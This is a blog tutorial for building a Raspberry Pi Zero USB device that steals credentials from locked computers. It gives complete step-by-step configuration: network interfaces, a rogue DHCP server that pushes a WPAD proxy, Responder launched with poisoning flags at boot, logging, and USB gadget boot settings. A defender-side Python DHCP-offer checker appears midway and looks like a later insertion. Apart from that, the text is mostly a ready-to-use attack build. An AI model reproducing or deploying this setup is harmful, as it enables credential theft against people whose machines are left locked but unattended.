Snagging Creds from locked machines - with a Raspberry Pi Zero

So this week's been quite exciting on the exploit front, and this one grabbed my attention straight away.

Rob Fuller, aka "Mubix", released the results of some of his latest research: stealing credentials from a locked machine with a Hak5 LAN Turtle or a device known as the USB Armory - see his article here.

Now, I have the LAN Turtle from Hak5, but the instructions given (in my opinion) missed a step. I have no doubt the issues will be fixed soon.

He explains the concept like this:

If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out (yes, logged in, just locked)?

and says

this is dead simple and shouldn’t work, but it does

Now, if you look at the install instructions for the Armory below:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone https://github.com/spiderlabs/responder

This got me thinking: maybe we can use the Raspberry Pi Zero to do the same job. Turns out we can. (It also turns out I'm not the only one to think this way; the comments are littered with people looking to use Pis.)

I'm assuming you have already set up your Raspberry Pi. I usually have a few kicking about, and I'm not going to cover how to do that; this is the internet, go find it. Please ensure that you are running a version of Raspbian released after May 2016.

Let's begin by installing what we need:

sudo pip install pycrypto
sudo su
cd ~/
git clone https://github.com/spiderlabs/responder

EDIT /ETC/NETWORK/INTERFACES

Open /etc/network/interfaces with your favorite text editor (I use nano for this stuff) and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1

CONFIGURE DHCPD SETTINGS: /ETC/DHCP/DHCPD.CONF

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}
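The configuration above hands every client a WPAD proxy URL through DHCP option 252 with a 60-second lease, which is what makes the locked machine start talking to the device. As an added defender-side example (not from the original post or from Responder), the script below parses a DHCP OFFER and flags those two properties; the packet bytes are constructed inline to mirror the dhcpd.conf above, and the 300-second "short lease" threshold is an assumption.

```python
import struct
from ipaddress import IPv4Address

# DHCP option codes used in the dhcpd.conf above (252 is the WPAD proxy-config option).
OPT_PAD, OPT_ROUTER, OPT_DNS, OPT_LEASE, OPT_MSGTYPE, OPT_WPAD, OPT_END = 0, 3, 6, 51, 53, 252, 255
MAGIC_COOKIE = b"\x63\x82\x53\x63"  # follows the 236-byte BOOTP header, marks start of options

def parse_dhcp_options(packet: bytes) -> dict:
    """Walk the TLV option list of a BOOTP/DHCP message into {code: raw bytes}."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(packet) and packet[i] != OPT_END:
        if packet[i] == OPT_PAD:  # single-byte padding, no length field
            i += 1
            continue
        length = packet[i + 1]
        opts[packet[i]] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def audit_offer(packet: bytes) -> list:
    """Return findings that make an OFFER look like a proxy-injecting rogue DHCP server."""
    opts = parse_dhcp_options(packet)
    findings = []
    if OPT_WPAD in opts:  # a WPAD URL pushed via DHCP is the key signal in this setup
        findings.append("option 252 (WPAD) present: " + opts[OPT_WPAD].decode(errors="replace"))
    lease = struct.unpack("!I", opts[OPT_LEASE])[0] if OPT_LEASE in opts else None
    if lease is not None and lease < 300:  # assumed threshold; dhcpd.conf above uses 60 s
        findings.append(f"lease under 5 minutes ({lease}s)")
    return findings

def build_offer(yiaddr: str, options: list) -> bytes:
    """Constructed sample OFFER (op=2, Ethernet hwtype); used only to exercise the parser."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 2, 1, 6, 0, 0x3903F326, 0, 0,
                         b"\0" * 4, IPv4Address(yiaddr).packed, b"\0" * 4, b"\0" * 4,
                         b"\0" * 16, b"\0" * 64, b"\0" * 128)
    body = b"".join(bytes([code, len(value)]) + value for code, value in options)
    return header + MAGIC_COOKIE + body + bytes([OPT_END])

SERVER = IPv4Address("192.168.2.201").packed
# Constructed OFFER mirroring the dhcpd.conf above: 60 s lease, server as router and DNS, WPAD URL.
ROGUE_OFFER = build_offer("192.168.2.1", [
    (OPT_MSGTYPE, b"\x02"), (OPT_LEASE, struct.pack("!I", 60)), (OPT_ROUTER, SERVER),
    (OPT_DNS, SERVER), (OPT_WPAD, b"http://192.168.2.201/wpad.dat")])
# Constructed OFFER from an ordinary LAN DHCP server, for comparison.
BENIGN_OFFER = build_offer("10.0.0.50", [
    (OPT_MSGTYPE, b"\x02"), (OPT_LEASE, struct.pack("!I", 86400)),
    (OPT_ROUTER, IPv4Address("10.0.0.1").packed), (OPT_DNS, IPv4Address("10.0.0.53").packed)])
```

Running audit_offer over OFFERs captured on a USB Ethernet interface that appeared unexpectedly gives a defender a concrete signal; on a managed Windows fleet the same risk is reduced by disabling WPAD auto-detection via Group Policy.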

EDIT /ETC/RC.LOCAL

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
/usr/sbin/dhcpd
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

CREATE THE CONFIGURATION FILE FOR SCREEN

Run sudo su, then open ~/.screenrc in nano and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Now, here's the thing: the OTG USB port on the Pi Zero is really designed to run as a host controller, but in our case we are attaching the Pi to a laptop, PC or Mac, so we need to change the behaviour of the Pi's USB port by turning it into a virtual Ethernet port. This is fairly easy to do:

  • Shut down the Pi Zero (shutdown -h now).
  • Remove the Micro SD card from the Pi.
  • Connect the Micro SD card to your computer.
  • We will need to modify config.txt and cmdline.txt to turn the OTG port into a virtual Ethernet port.

EDIT CONFIG.TXT

Add this after the last line:
dtoverlay=dwc2

EDIT CMDLINE.TXT

After rootwait (the last word on the first line) add a space and then
modules-load=dwc2,g_ether

That's almost us.

  • Safely eject the Micro SD card.
  • Put it back in the Pi Zero.
  • The device is ready; use the USB OTG cable to connect it to the PC. Happy (responsible) hacking!